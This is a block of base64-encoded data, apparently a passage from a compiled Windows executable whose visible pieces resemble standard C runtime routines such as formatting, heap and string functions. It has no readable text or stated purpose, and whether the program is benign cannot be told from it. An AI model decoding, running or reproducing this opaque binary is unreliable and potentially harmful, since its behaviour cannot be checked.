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 